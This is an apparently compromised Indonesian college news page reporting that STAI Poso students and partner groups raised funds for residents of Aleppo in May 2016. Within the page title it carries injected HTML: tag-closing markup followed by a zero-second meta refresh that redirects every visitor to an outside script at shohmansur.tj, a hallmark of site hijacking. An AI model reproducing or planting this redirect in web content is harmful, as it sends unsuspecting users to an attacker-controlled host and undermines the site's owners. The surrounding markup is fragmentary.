/xmlrpc.php" /> Mahasiswa STAI Poso Mengadakan Penggalangan Dana Untuk Aleppo Bersama KAMMI dan Syam Organizer Kab. Poso – “</html></link></script><meta http-equiv="refresh" content="0;URL=http://shohmansur.tj/rootz.php"> /wp-includes/wlwmanifest.xml" /> /favicon.ico" type="image/x-icon" />

« /2016/03/25/ujian-komprehensif-stai-poso-tahun-2016/" rel="prev">UJIAN KOMPREHENSIF STAI POSO TAHUN 2016

/2016/08/13/stai-poso-gelar-wisuda-sarjana-angkatan-ii-dan-dies-natalis-ke-6/" rel="next">STAI Poso Gelar Wisuda Sarjana Angkatan II dan Dies Natalis Ke-6 »

Mei 12

Dok. Pelaksana

Mahasiswa Sekolah Tinggi Agama Islam (STAI) Poso yang tergabung dalam Kesatuan Aksi Mahasiswa Muslim Indonesia (KAMMI) Komisariat Poso melakukan aksi penggalangan dana untuk Masyarakat Aleppo, Suriah bersama Syam Organizer dan Ikatan Majelis Ta'lim Muslimah Kab. Poso, Kamis (12/5/2016) pagi di depan Eks-Pasar Sentral Poso.

Korlap Aksi, Ari Junaedi mengatakan, penggalangan dana ini untuk membantu masyarakat Aleppo di Suriah yang terkena musibah.

Dok. Pelaksana

"Dana yang terkumpul akan kita sampaikan melalui Syam Organizer yang berada di Poso, kemudian dikirim ke masyarakat muslim yang ada di Aleppo" ungkapnya.

Aksi penggalangan dana berlangsung mulai dari pukul 08.00 - 10.00 WIB. Putri Anisa juga menyatakan, akan kembali melakukan penggalangan tersebut beberapa hari kedepan, termasuk di Sekolah Tinggi Agama Islam (STAI) Poso.

"Mengingat begitu banyak masyarakat muslim Aleppo yang menjadi korban, maka perlu diadakan penggalangan dana secara bertahap, termasuk penggalangan dana akan berlangsung di kampus kita juga" ungkapnya.

Tautan permanen menuju artikel ini: "/2016/05/12/mahasiswa-stai-poso-mengadakan-penggalangan-dana-untuk-aleppo-bersama-kammi-dan-syam-organizer-kab-poso/